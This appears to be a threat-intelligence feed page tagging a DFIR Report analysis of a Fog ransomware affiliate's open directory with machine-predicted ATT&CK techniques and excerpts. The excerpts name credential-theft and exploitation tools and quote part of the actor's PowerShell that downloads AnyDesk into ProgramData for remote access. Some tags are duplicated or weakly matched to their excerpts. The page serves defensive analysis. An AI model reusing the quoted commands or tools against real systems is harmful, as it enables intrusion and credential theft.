TTPwire Vol. 1 · MITRE ATT&CK · Tagged


The DFIR Report

Navigating Through The Fog

editor · 2025-04-28

ATT&CK techniques detected

28 predictions
T1572 Protocol Tunneling (99%)
“as a Sliver C2. It was not possible to analyze slv.bin and obtain further information out of the shellcode since it was encrypted. Likely, it was used to connect back to the same Sliver server. The binary sliver-client_linux is the executable used to connect to a Sliver ser…”

T1046 Network Service Discovery (99%)
“and execute a port scan by performing the following actions: - Reads and parses data.txt to get the IP address, username, password and domain name (if any) of the target appliance. - For every entry in data.txt, which represents a potential valid account, obtains the domain…”

T1486 Data Encrypted for Impact (98%)
“, credential theft, and command-and-control activities. Among the tools were SonicWall Scanner for exploiting VPN credentials, DonPAPI for extracting Windows DPAPI-protected credentials, Certipy for abusing Active Directory Certificate Services (AD CS), Zer0dump, and Pach…”

T1558.003 Kerberoasting (95%)
“hashes. --no_recent: disables the collection of recent files and documents --no_sysadmins: excludes systems administrators from the credential collection process -o <filename>: saves the output into a specific folder. The threat actor also employs dpapi.py from t…”

T1219 Remote Access Tools (93%)
“\AnyDesk.exe --get-id } A comprehensive description of AnyDesk and all the potential techniques to detect it are detailed in lolrmm.io. Credential Access: Credentials from Password Stores. DonPAPI & Impacket dpapi: DonPAPI provides functionalities to locate and retrieve Window…”

T1090.003 Multi-hop Proxy (88%)
“to drop shells and dump hashes. Command & Control: Proxy. Proxychains: Proxychains is a tool used to route network traffic through proxy servers and it supports multiple types of proxies such as SOCKS4, SOCKS5 and HTTPS. Proxychains can be combined with post-exploitation framewo…”

T1558.003 Kerberoasting (87%)
“…y to extract credentials from the compromised domain controller. - After exploitation, Zer0dump attempts to restore the original machine account password. Pachine & noPac: Pachine and noPac are offensive tools developed to exploit CVE-2021-42278 and CVE-2021-42287 vuln…”

T1486 Data Encrypted for Impact (86%)
“Navigating Through The Fog. Key Takeaways - An open directory associated with a ransomware affiliate, likely linked to the Fog ransomware group, was discovered in December 2024. It contained tools and scripts for reconnaissance, exploitation, lateral mov…”

T1090.002 External Proxy (85%)
“to drop shells and dump hashes. Command & Control: Proxy. Proxychains: Proxychains is a tool used to route network traffic through proxy servers and it supports multiple types of proxies such as SOCKS4, SOCKS5 and HTTPS. Proxychains can be combined with post-exploitation framewo…”

T1219 Remote Access Tools (83%)
“, credential theft, and command-and-control activities. Among the tools were SonicWall Scanner for exploiting VPN credentials, DonPAPI for extracting Windows DPAPI-protected credentials, Certipy for abusing Active Directory Certificate Services (AD CS), Zer0dump, and Pach…”

T1588.001 Malware (81%)
“, credential theft, and command-and-control activities. Among the tools were SonicWall Scanner for exploiting VPN credentials, DonPAPI for extracting Windows DPAPI-protected credentials, Certipy for abusing Active Directory Certificate Services (AD CS), Zer0dump, and Pach…”

T1555.004 Windows Credential Manager (78%)
“\AnyDesk.exe --get-id } A comprehensive description of AnyDesk and all the potential techniques to detect it are detailed in lolrmm.io. Credential Access: Credentials from Password Stores. DonPAPI & Impacket dpapi: DonPAPI provides functionalities to locate and retrieve Window…”

T1219 Remote Access Tools (70%)
“url = "http://download.anydesk.com/anydesk.exe" $file = "C:\ProgramData\anydesk.exe" $clnt.DownloadFile($url, $file) # powershell mkdir "C:\ProgramData\anydesk" # powershell -command "(New-Object System.Net.WebClient).DownloadFile('ht…”

T1046 Network Service Discovery (66%)
“which is then provided to Nmap for port scanning. - Once the Nmap scan is completed, the NetExtender process is terminated. Arctic Wolf also linked the usage of compromised SonicWall credentials to Fog ransomware. Lateral Movement: Remote Services: SMB/Windows Admin Shares. NetE…”

T1090 Proxy (61%)
“to drop shells and dump hashes. Command & Control: Proxy. Proxychains: Proxychains is a tool used to route network traffic through proxy servers and it supports multiple types of proxies such as SOCKS4, SOCKS5 and HTTPS. Proxychains can be combined with post-exploitation framewo…”

T1059.004 Unix Shell (56%)
“a href="v1.0.0.zip">v1.0.0.zip</a></li><li><a href="videos/">videos/</a></li><li><a href="zer0dump/">zer0dump/</a></li></ul><hr></body></html> This company is listed in Fog's data leak site, as sho…”

T1558.004 AS-REP Roasting (53%)
“from RC4 (etype 23), which is common in Kerberoasting attacks, to AES-256 (etype 18), which is usual in legitimate traffic. Based on the available .bash_history file, the threat actor only downloaded the tool. Privilege Escalation: Exploitation for Privilege Escalation. Zer0d…”

T1558.003 Kerberoasting (53%)
“from RC4 (etype 23), which is common in Kerberoasting attacks, to AES-256 (etype 18), which is usual in legitimate traffic. Based on the available .bash_history file, the threat actor only downloaded the tool. Privilege Escalation: Exploitation for Privilege Escalation. Zer0d…”

T1090.001 Internal Proxy (51%)
“to drop shells and dump hashes. Command & Control: Proxy. Proxychains: Proxychains is a tool used to route network traffic through proxy servers and it supports multiple types of proxies such as SOCKS4, SOCKS5 and HTTPS. Proxychains can be combined with post-exploitation framewo…”

T1219 Remote Access Tools (48%)
“Navigating Through The Fog. Key Takeaways - An open directory associated with a ransomware affiliate, likely linked to the Fog ransomware group, was discovered in December 2024. It contained tools and scripts for reconnaissance, exploitation, lateral mov…”

T1588.001 Malware (45%)
“- All Intel: includes everything from private threat briefs and threat feed, plus private events, threat actor insights reports, long-term tracking, data clustering, and other curated intel. - Private Sigma Ruleset: features 180+ Sigma rules derived from 50+ cases, mapped t…”

T1219.002 Remote Desktop Software (41%)
“url = "http://download.anydesk.com/anydesk.exe" $file = "C:\ProgramData\anydesk.exe" $clnt.DownloadFile($url, $file) # powershell mkdir "C:\ProgramData\anydesk" # powershell -command "(New-Object System.Net.WebClient).DownloadFile('ht…”

T1003 OS Credential Dumping (40%)
“, credential theft, and command-and-control activities. Among the tools were SonicWall Scanner for exploiting VPN credentials, DonPAPI for extracting Windows DPAPI-protected credentials, Certipy for abusing Active Directory Certificate Services (AD CS), Zer0dump, and Pach…”

T1080 Taint Shared Content (40%)
“Navigating Through The Fog. Key Takeaways - An open directory associated with a ransomware affiliate, likely linked to the Fog ransomware group, was discovered in December 2024. It contained tools and scripts for reconnaissance, exploitation, lateral mov…”

T1546.004 Unix Shell Configuration Modification (36%)
“Fog ransomware group based on: In a saved open-directory content retrieved through fofa.info, there is a folder called ouroverde.net.br, which is a threat actor's victim. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4…”

T1219 Remote Access Tools (35%)
“which is then provided to Nmap for port scanning. - Once the Nmap scan is completed, the NetExtender process is terminated. Arctic Wolf also linked the usage of compromised SonicWall credentials to Fog ransomware. Lateral Movement: Remote Services: SMB/Windows Admin Shares. NetE…”

T1219.002 Remote Desktop Software (34%)
“which is then provided to Nmap for port scanning. - Once the Nmap scan is completed, the NetExtender process is terminated. Arctic Wolf also linked the usage of compromised SonicWall credentials to Fog ransomware. Lateral Movement: Remote Services: SMB/Windows Admin Shares. NetE…”

T1588.002 Tool (31%)
“, credential theft, and command-and-control activities. Among the tools were SonicWall Scanner for exploiting VPN credentials, DonPAPI for extracting Windows DPAPI-protected credentials, Certipy for abusing Active Directory Certificate Services (AD CS), Zer0dump, and Pach…”

Summary

Key Takeaways

An open directory associated with a ransomware affiliate, likely linked to the Fog ransomware group, was discovered in December 2024. It contained tools and scripts for reconnaissance, exploitation, lateral movement, and persistence...

The post Navigating Through The Fog appeared first on The DFIR Report.